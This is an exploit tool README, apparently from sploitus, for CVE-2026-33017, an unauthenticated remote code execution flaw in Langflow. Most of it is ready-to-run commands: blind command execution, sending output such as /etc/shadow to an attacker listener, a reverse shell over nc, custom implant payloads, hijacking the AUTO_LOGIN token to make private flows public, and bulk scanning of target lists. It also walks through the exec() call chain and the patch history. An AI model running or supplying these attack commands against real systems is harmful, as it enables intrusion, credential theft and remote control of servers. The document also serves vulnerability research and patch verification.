Share
## https://sploitus.com/exploit?id=FEF5404F-AFD2-53B8-8B26-93FEAB64EA6D
# CVE-2026-33017 - Langflow Unauthenticated RCE

```
        _____
       /     \
      | () () |
       \  ^  /
        |||||
```

> **exec() with no auth, no sandbox, no hope.**

Langflow  chat.py -> start_flow_build() -> build_graph_from_data()
  -> Graph.from_payload() -> loading.py -> eval.py create_class()
  -> validate.py prepare_global_scope() -> exec(compiled_code)
  -> arbitrary code runs as the server process. game over.
```

## Install

```bash
git clone https://github.com/oscarmine/CVE-2026-33017.git
cd CVE-2026-33017
pip install requests
```

## Usage

### Recon - check if target is vulnerable

```bash
python3 exploit.py --url http://target:7860 --check
```

### Blind command execution

```bash
python3 exploit.py --url http://target:7860 --cmd "id"
```

### Exfiltrate output via GET callback (base64 in URL path)

```bash
# Terminal 1: start listener
python3 -m http.server 8080

# Terminal 2: fire exploit
python3 exploit.py --url http://target:7860 --cmd "id" \
  --callback-get http://your-ip:8080

# Decode the base64 from your listener logs:
echo "dWlkPTEwMDAo..." | base64 -d
```

### Exfiltrate output via POST callback (raw output in body)

```bash
# Terminal 1: start listener
nc -l 8080

# Terminal 2: fire exploit
python3 exploit.py --url http://target:7860 --cmd "cat /etc/shadow" \
  --callback-post http://your-ip:8080

# Raw output lands directly in the POST body - no decoding needed
```

### Reverse shell

```bash
# Terminal 1: start listener
nc -l 4444

# Terminal 2: fire exploit
python3 exploit.py --url http://target:7860 --revshell your-ip 4444
```

### Custom Python payload

```bash
python3 exploit.py --url http://target:7860 --payload-file implant.py
```

Payload file rules:
- Code runs at module level via `exec()` inside `prepare_global_scope()`
- Must use **assignments** (e.g. `_x = os.popen(...).read()`) because the AST filter only executes `Assign`, `FunctionDef`, `ClassDef` nodes
- Blocking calls should use `threading.Thread(daemon=True)` to avoid killing the async event loop

### Auto-promote private flows

When no PUBLIC flows exist but AUTO_LOGIN is enabled (default in many deployments):

```bash
python3 exploit.py --url http://target:7860 --auto-promote --cmd "id"
```

This hijacks the AUTO_LOGIN token, PATCHes the first flow to PUBLIC, then exploits it.

### Bulk scan

Scan multiple targets from a file (vulnerability check only):

```bash
python3 exploit.py --scan-file targets.txt
python3 exploit.py --scan-file targets.txt --threads 20 --scan-output results.txt
```

**targets.txt** format:
```
http://10.10.10.5:7860
http://10.10.10.6:7860
192.168.1.100:7860
# comments are ignored
```

Output shows:
- Version detection (vulnerable / patched)
- AUTO_LOGIN status (free token = easy escalation)
- Number of public flows (ready to exploit immediately)

### Proxy through Burp

```bash
python3 exploit.py --url http://target:7860 --cmd "id" \
  --proxy http://127.0.0.1:8080
```

## How it works

1. **Version check** - probes `/api/v1/version` to fingerprint the target
2. **Flow discovery** - uses AUTO_LOGIN (if enabled) to enumerate flows and find PUBLIC ones
3. **Payload injection** - crafts a minimal flow graph with a `CustomComponent` node containing malicious Python in the `code` field
4. **Code execution** - POSTs to `/api/v1/build_public_tmp/{flow_id}/flow` with the crafted `data` parameter. Langflow compiles the graph, which calls `create_class()` -> `prepare_global_scope()` -> `exec()` on the attacker's code

The fix in v1.9.0 removes the `data` parameter entirely, forcing the endpoint to only use stored flow data from the database.

## Patch analysis

| Version | Status |
|---|---|
| <= 1.8.1 | Vulnerable |
| 1.8.2 | Claimed fix in changelog but **code was never changed** (JFrog confirmed) |
| 1.9.0-dev0 to dev11 | Still vulnerable |
| **1.9.0** | **Actually fixed** - `data` parameter removed from endpoint |

## References

- [NVD - CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017)
- [JFrog Research - patch bypass analysis](https://research.jfrog.com/post/langflow-latest-version-was-not-fixed/)
- [Sysdig - exploitation in 20 hours](https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017)
- [Fix commit](https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0)
- GitHub Advisory: GHSA-rvqx-wpfh-mfx7

## Disclaimer

This tool is for **authorized security research only**. Only use against systems you have explicit permission to test. The author is not responsible for misuse.